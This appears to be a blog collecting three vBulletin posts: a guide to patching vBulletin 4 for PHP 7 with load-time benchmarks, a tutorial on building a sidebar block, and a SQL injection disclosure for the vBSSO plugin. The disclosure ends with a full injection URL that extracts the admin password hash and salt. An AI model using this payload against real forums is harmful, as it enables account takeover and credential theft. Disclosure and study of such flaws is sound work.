vBulletin 4 and PHP 7, making it work.

PHP 7 has been officially released on the 3rd of December.
It introduces a lot of new features, deprecates a bunch of functions and most importantly, its performance received a huge boost.

I personally used https://webtatic.com/packages/php70/ to upgrade my PHP from 5.4.45 to 7 on CentOS 6.7.
Make sure that you install PHP OPCache as well, it gives you a huge performance boost.

Now vBulletin 4 (<= 4.2.3 at the time of writing this post) does not support PHP 7 out of the box. A couple of changes have to be made in order to make it work smoothly with PHP 7.
There are 3 things we have to fix:
– Methods with the same name as their class may not be constructors.
– Function name must be a string.
– Redefinition of arguments are not allowed.

Step 1: configuration file
First be sure you have a backup of your forum files, this is very important in case the changes do not end up working for you.
Now open the /includes/config.php file and make sure that your datastore class is set to vB_Datastore_Filecache, APC/xCache/Memcached will not work since they do not support PHP 7 (yet) and it’s not necessary to use either of those anyway since OPCache does the job.

Step 2: fixing “function name must be a string”
First we edit /includes/class_bbcode.php. Look for the following:

$pending_text = $this->$tag_info['callback']($open['data'], $open['option']);

and change it to:

$function = $tag_info['callback'];
$pending_text = $this->$function($open['data'], $open['option']);

This will fix the “function name must be a string” error. It seems that PHP doesn’t like it when the value of a key in an array is directly being used as a function name. My fix first assigns it to a variable and then uses it as the function name.

Step 3: fixing /includes/class_datastore.php
Open the file /includes/class_datastore.php and find each of the following:

function vB_Datastore_Memcached(&$registry, &$dbobject)
function vB_Datastore_Filecache(&$registry, &$dbobject)

change them both to:

function __construct(&$registry, &$dbobject)

Now also find the following:

parent::vB_Datastore($registry, $dbobject);

and replace all occurrences to:

parent::__construct($registry, $dbobject);

Step 4: fixing /includes/class_hook.php
Open the file /includes/class_hook.php and find the following:

	function vBulletinHook()
	{
	}

and change it to:

	function __construct()
	{
	}

Step 5: fixing /includes/class_core.php
Open the file /includes/class_datastore.php and find each of the following:

function vB_Database(&$registry)
function vB_Datastore(&$registry, &$dbobject)
function vB_Input_Cleaner(&$registry)
function vB_Registry()
function vB_Session(&$registry, $sessionhash = '', $userid = 0, $password = '', $styleid = 0, $languageid = 0)

and change all of the function names to __construct:

function __construct(&$registry)
function __construct(&$registry, &$dbobject)
function __construct(&$registry)
function __construct()
function __construct(&$registry, $sessionhash = '', $userid = 0, $password = '', $styleid = 0, $languageid = 0)

Step 6: fixing /vb/exception/parser.php
This is probably a mistake by vBulletin, but we have to fix it in order to make it work.
Open the file /vb/exception/parser.php and find the following:

	public function __construct($message, $line = false, $code = false, $file = false, $line = false)
	{
		$message = $message ? $message : 'Parser Error';
		
		if (!empty($line))
		{
			$message .= "::$line";
		}
		
		parent::__construct($message, $code, $file, $line);
	}

and replace it by:

	public function __construct($message, $line = false, $code = false, $file = false, $line2 = false)
	{
		$message = $message ? $message : 'Parser Error';
		
		if(empty($line)){
			$line = $line2;
		}

		if (!empty($line))
		{
			$message .= "::$line";
		}
		
		parent::__construct($message, $code, $file, $line);
	}

And that’s it. Your vBulletin installation should now work correctly with PHP 7.
In case it does not, check the error logs of your web-server/PHP and make sure that none of your plugins or custom scripts are making use of deprecated functions.

Below is a comparison of vBulletin 4 and PHP 5.4, PHP 7 and PHP 7 with OPCache.
As you can see, vBulletin loads almost 2.5(!) times faster.

Before the upgrade (PHP 5.4.45)
Homepage
409.31 – 429.84 – 389.37 – 401.51 – 389.75 – 426.69
~407.75ms average loading time

Forum Category
518.51 – 491.49 – 447.64 – 491.94 – 433.52 – 543.93
~487.84ms average loading time

Thread
326.34 – 399.72 – 387.09 – 383.79 – 370.03 – 375.21
~373.70ms average loading time

—–

After the upgrade (PHP 7 WITHOUT OPCache)
Homepage
289.79 – 291.41 – 289.11 – 253.45 – 285.06 – 259.98
~278.13ms average loading time

Forum Category
281.83 – 333.31 – 293.23 – 276.73 – 268.91 – 281.63
~289.27ms average loading time

Thread
221.73 – 344.83 – 257.84 – 250.72 – 250.04 – 220.07
~257.53ms average loading time

—–

After the upgrade (PHP 7 WITH OPCache)
Homepage
225.63 – 200.26 – 219.48 – 181.72 – 199.93 – 177.55
~200.76ms average loading time

Forum Category
194.95 – 184.47 – 237.45 – 182.62 – 185.93 – 178.06
~193.91ms average loading time

Thread
207.83 – 156.41 – 146.43 – 143.13 – 155.13 – 142.61
~158.59ms average loading time

How to create your own vBulletin 4 sidebar block.

Since I couldn’t really find any guide on how to create your own forum sidebar block with custom settings, I decided to write this little guide. It consists of a few things:
– The .php file which takes care of most of the functionality
– The configuration
– Phrases

The main .php file
All of the current blocks are present in the /includes/block/ folder. To make your own block we have to make a new file in this directory. Name it something logical since the filename is dependent of a few things. We are simply going to copy the threads.php file in the /includes/block/ folder. For this guide, I copied the threads.php file to technidev.php. The functionality I will implement is to show the latest x registered users.

Now open the file you just duplicated and change the classname, currently it’s “class vB_BlockType_Threads extends vB_BlockType” and we have to rename that to “class vB_BlockType_Technidev extends vB_BlockType”.
Say you duplicated the threads.php file to onlineusers.php, you name it to “class vB_BlockType_Onlineusers extends vB_BlockType”.

The file consists of a few important things:
– The protected $settings variable. This defines the settings of the block.
– getData function. You should use this to retrieve all of the necessary data.
– getHTML function. This will call the getData function and returns any output.

$settings variable
This will display all of the settings when you want to add a new block in the admincp. For our functionality I want the user to be able to select which usergroup is a “registered” usergroup and how many of the latest users we want to display. That means we have to add 2 settings as follows:

	protected $settings = array(
		'technidev_usergroupid' => array(
			'defaultvalue' => 2,
			'displayorder' => 1,
			'datatype'     => 'integer'
		),
		'technidev_amount' => array(
			'defaultvalue' => 5,
			'displayorder' => 2,
			'datatype'     => 'integer'
		)
	);

That’s how easy it is, the $settings variable is very flexible and you can add many things. All of the settings can be reached with the $this->config array, $this->config[‘technidev_usergroupid’] for example. But say you want to make a select box where the user will be able to select multiple usergroupid’s, you can add an option such as:

	protected $settings = array(
		'technidev_usergroupids' => array(
			'defaultvalue' => -1,
			'optioncode'   => 'selectmulti:eval
			$uid = $vbulletin->db->query_read("SELECT usergroupid FROM " . TABLE_PREFIX . "usergroup ORDER BY title ASC");
			$options = array();
			while($row = $vbulletin->db->fetch_array($uid)){
				$options[$row[\'id\']] = $row[\'title\'];
			}',
			'displayorder' => 4,
			'datatype'     => 'arrayinteger'
		)
	);

This will set $this->config[‘technidev_usergroupids’] as an array.
Note that if you are an advanced user, check out the includes/adminfunctions_options.php file and the function print_setting_row, you can see which options you can use in that function.

The getData and getHTML function
The getData function will be used to retrieve any data and return an array. In my case I want to retrieve the latest registered users based on the settings which are specified by the user. We can do something such as:

	public function getData()
	{
		$user = $this->registry->db->query_read("
			SELECT userid, username
			FROM " . TABLE_PREFIX . "user
			WHERE usergroupid = " . $this->config['technidev_usergroupid'] . "
			ORDER BY userid DESC
			LIMIT 0," . $this->config['technidev_amount']);

		$users = array();
		while($row = $this->registry->db->fetch_array($user)){
			$users[] = $row;
		}
		return $users;
	}

The getHTML function should return the HTML output, in this case we can simply create a template, register variables and return the rendered output. Since we retrieve an array, we can simply register it as a variable to our own block_technidev template and then register the output to a variable for the block_html template.

The getHTML function will look like this:

	public function getHTML($userarray = false)
	{
		if (!$userarray)
		{
			$userarray = $this->getData();
		}

		if ($userarray)
		{
			$templater = vB_Template::create('block_technidev');
				$templater->register('blockinfo', $this->blockinfo);
				$templater->register('stream', $userarray);
			$block = $templater->render();

			$templater = vB_Template::create('block_html');
				$templater->register('blockinfo', $this->blockinfo);
				$templater->register('content', $block);
			return $templater->render();
		}
	}

And the template block_technidev will look something like:

		

Phrases
This is a very important thing because if you don’t add the required phrases, the block will miss a lot of information such as the setting titles/descriptions and the name of the block itself.
We first add the block phrase:

1. Languages & Phrases -> Phrase Manager -> Add New Phrase
2. Select “Forum Blocks” as the Phrase Type and “vBulletin” as the product
3. Set the varname to blocktype_yourblock, blocktype_technidev in my case.
4. Set the text to your block name. “Technidev Registered Users” in my case and save.

Now we have to register the variables for the settings:

1. Languages & Phrases -> Phrase Manager -> Add New Phrase
2. Select “Forum Blocks Settings” as the Phrase Type and “vBulletin” as the product
3. Set the varname to “setting_technidev_usergroupid_title”
4. Set the text, this is the title of the setting and save.
5. Repeat this but use “setting_technidev_usergroupid_desc” as varname, this will be the description of the setting.

Testing
Now if you did it all right, you should go to Forums & Moderators -> Forum Blocks Manager -> Click at the bottom on “Reload Block Types” -> Now add a new block -> Find the name of your block -> Configure the settings and add it.

Add Sidebar Block

I added and configured my block, and I now see this in the sidebar:

Sidebar Block

It doesn’t look fancy, but you get the idea. You can fully customize it to your needs within the template and the .php file.

vBulletin vBSSO Single Sign-On – <= 1.4.14 – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=270517
Version: <= 1.4.14

This plugin is vulnerable to SQL injection at the /vbsso/avatar.php file in the fetchUserinfo function.
It requires a big UNION ALL SELECT query and commenting out the LIMIT function of SQL. If SQL injection is a success, the browser will redirect the user to a URL where the URL contains the extracted information.

I will talk about 2 functions which are used, goToAvatarUrl and fetchUserinfo. I will only provide a small portion of the code of the fetchUserinfo function.

    public function goToAvatarUrl() {
        $vbsso_forum_root = $this->settings['bburl'];
        $url = VBSSO_ASSETS_AVATAR_NOT_FOUND_IMAGE_FILE;

        if (isset($_GET['id']) && !empty($_GET['id'])) {
            $id = sharedapi_gpc_variable('id');

            $userinfo = $this->fetchUserinfo($id);

            if ($userinfo) {
                $this->fetchAvatarFromUserinfo($userinfo, (sharedapi_gpc_variable('thumb') == 'true'));
                $url = $userinfo['avatarurl'];
            }

            $host = $_SERVER['HTTP_HOST'];
            $vbsso_avatar = preg_match("/$host/", $url) ? $url : $vbsso_forum_root . '/' . $url;

            $this->closeSqlConnection();
            sharedapi_url_redirect($vbsso_avatar);
        } else {
            $this->closeSqlConnection();
            sharedapi_url_redirect($vbsso_forum_root . '/' . $url);
        }
    }

 

    private function fetchUserinfo(&$hash) {
        // Exit if a guest, otherwise we waste time running the query.
        if (!$hash) {
            return false;
        }

        $query = "SELECT userfield.*, usertextfield.*, user.*, usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS passworddate,
			IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid" .
            $this->iif($this->settings['avatarenabled'], ', avatar.avatarpath, NOT ISNULL(customavatar.userid) AS hascustomavatar,
            customavatar.dateline AS avatardateline, customavatar.width AS avwidth, customavatar.height AS avheight,
            customavatar.height_thumb AS avheight_thumb, customavatar.width_thumb AS avwidth_thumb, customavatar.filedata_thumb') .
            " FROM " . TABLE_PREFIX . "user AS user
		LEFT JOIN " . TABLE_PREFIX . "userfield AS userfield ON (user.userid = userfield.userid)
        LEFT JOIN " . TABLE_PREFIX . "usergroup AS usergroup ON (usergroup.usergroupid = user.usergroupid)
		LEFT JOIN " . TABLE_PREFIX . "usertextfield AS usertextfield ON (usertextfield.userid = user.userid) " .
            $this->iif($this->settings['avatarenabled'], "LEFT JOIN " . TABLE_PREFIX . "avatar AS avatar ON (avatar.avatarid = user.avatarid)
            LEFT JOIN " . TABLE_PREFIX . "customavatar AS customavatar ON (customavatar.userid = user.userid) ") .
            "WHERE MD5(LOWER(user.email)) LIKE '{$hash}' LIMIT 1";

        $user = $this->mysqli->query($query);

        $user = ($user) ? $user->fetch_assoc() : false;

        // Rest of the code.

The goToAvatarUrl function checks if the id parameter is set in the URL and then executes the sharedapi_gpc_variable function over it.

After that it calls the fetchUserinfo function which executes a query which uses the unsanitized variable $hash, which is the id parameter in the URL. Once the query has been executed it will call the fetchAvatarFromUserinfo function which creates the URL where the user will be redirected to.

To exploit this, you need to execute a rather large UNION ALL SELECT query like this:
http://example.com/vbsso/vbsso.php?a=act&do=avatar&id=' or user.userid = 1 UNION ALL SELECT userfield.*, usertextfield.*, user.*, usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, concat(user.password, 0x3a, user.salt) AS avatarpath, NOT ISNULL(customavatar.userid) AS hascustomavatar, customavatar.dateline AS avatardateline, customavatar.width AS avwidth, customavatar.height AS avheight, customavatar.height_thumb AS avheight_thumb, customavatar.width_thumb AS avwidth_thumb, customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN usertextfield AS usertextfield ON (usertextfield.userid = user.userid) LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT JOIN customavatar AS customavatar ON (customavatar.userid = user.userid) WHERE user.userid = 1 ORDER BY avatarpath DESC%23

For example, by visiting this URL on a vulnerable forum, you will be redirected to http://example.com/9d0d647f535a4c1f493eabf3d69ca89a:nO^sh9;TVNxGJ”X’+3cYkq9Z4Cd3WS which obviously contains the hash and salt of userid 1.